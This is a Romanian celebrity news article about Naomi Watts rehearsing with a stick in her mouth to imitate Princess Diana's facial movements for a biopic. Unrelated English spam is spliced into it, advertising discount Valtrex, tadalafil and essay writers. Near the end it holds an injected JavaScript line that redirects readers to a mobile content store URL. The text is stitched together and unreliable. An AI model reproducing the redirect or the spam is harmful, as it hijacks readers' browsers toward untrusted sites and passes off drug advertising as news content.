Naomi Watts dezvăluie eforturile pe care le-a făcut pentru rolul prinţesei Diana

Purchase Discount Medication! Valtrex Generic Canadian. Cheapest Rates, Anyone Buy Valtrex online. Actriţa australiană Naomi Watts, care joacă rolul prinţesei Diana într-un film care va fi lansat curând, a trebuit să facă repetiţii cu un beţişor în gură, pentru a-şi putea “paraliza” faţa astfel încât să o imite cât mai bine pe aceasta.

naomi

considering the information of three randomized, multicenter, double, blind clinical studies and a retrospective analysis of the medical documentation, fda approved on october 7, 2011 tadalafil medication for the treatment of Erectile Dysfunction accompanied with primary and secondary symptoms of benign prostatic hyperplasia (bph) in men above 45 years.

Actriţa în vârstă de 44 de ani a fost atât de hotărâtă să o imite pe prinţesă, încât a făcut eforturi speciale pentru a controla felul în care i se mişcă faţa când vorbeşte.

“Nu am vrut doar să arăt ca ea, am fost atentă la tonul vocii sale, la modul în care îşi mişca faţa. Este exact invers faţă de modul în care îmi mişc eu, în mod natural, chipul. Eu îmi mişc faţa pe partea dreaptă, în timp ce ea îşi mişca faţa mai mult pe partea stângă”, a spus actriţa, informează contactmusic.com.

“A trebuit să merg cu un beţişor în gură ca să îmi paralizez faţa pe partea dreaptă, timp de mai multe săptămâni”, a adăugat aceasta.

Naomi Watts a spus că s-a chinuit mult la gândul de a juca rolul prinţesei Diana, deoarece era îngrijorată de faptul că oamenii o vor critica dacă intepretarea sa nu va fi pe măsura aşteptărilor spectatorilor.

“Era un amestec de tensiune şi teamă”, a spus aceasta. “Din cauza aceasta, m-am chinuit cu această alegere. M-am temut de toate comparaţiile pe care oamenii le vor face (cu prinţesa Diana, n.r.). Nu am nasul potrivit, nu sunt destul de înaltă, nu am vocea potrivită”, a adăugat aceasta.

professional team of essay writers

Filmul “Caught In Flight”, care prezintă viaţa prinţesei Diana, va avea o lansare limitată în SUA, pe 1 noiembrie. Filmul, regizat de Oliver Hirschbiegel, prezintă ultimii doi ani din viaţa prinţesei şi descrie felul în care aceasta a reuşit să îşi găsească fericirea în viaţa personală, după divorţul de prinţul Charles, şi să devină una dintre cele mai renumite activiste din lume în domeniul programelor umanitare.

Acest proiect cinematografic, produs de compania britanică Ecosse Films, este realizat pe baza unui scenariu scris de Stephen Jeffreys.

Diana, fosta soţie a prinţului Charles, moştenitorul tronului britanic, şi iubitul ei Dodi Al-Fayed, fiul omului de afaceri egiptean Mohamed Al-Fayed, precum şi şoferul lor, Henri Paul, au murit într-un accident de automobil care a avut loc pe 31 august 1997, în tunelul de sub podul Alma din Paris. Dodi Al-Fayed şi şoferul au fost declaraţi morţi la locul accidentului, în timp ce prinţesa Diana a murit mai târziu la spital. Garda de corp Trevor Rees-Jones, membru al echipei însărcinate cu securitatea familiei Al-Fayed, a supravieţuit.

Diana, mama prinţilor William şi Harry, s-a căsătorit cu prinţul Charles în 1981. Cei doi s-au despărţit în 1992 şi au divorţat în 1996.

sursa: http://www.mediafax.ro

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *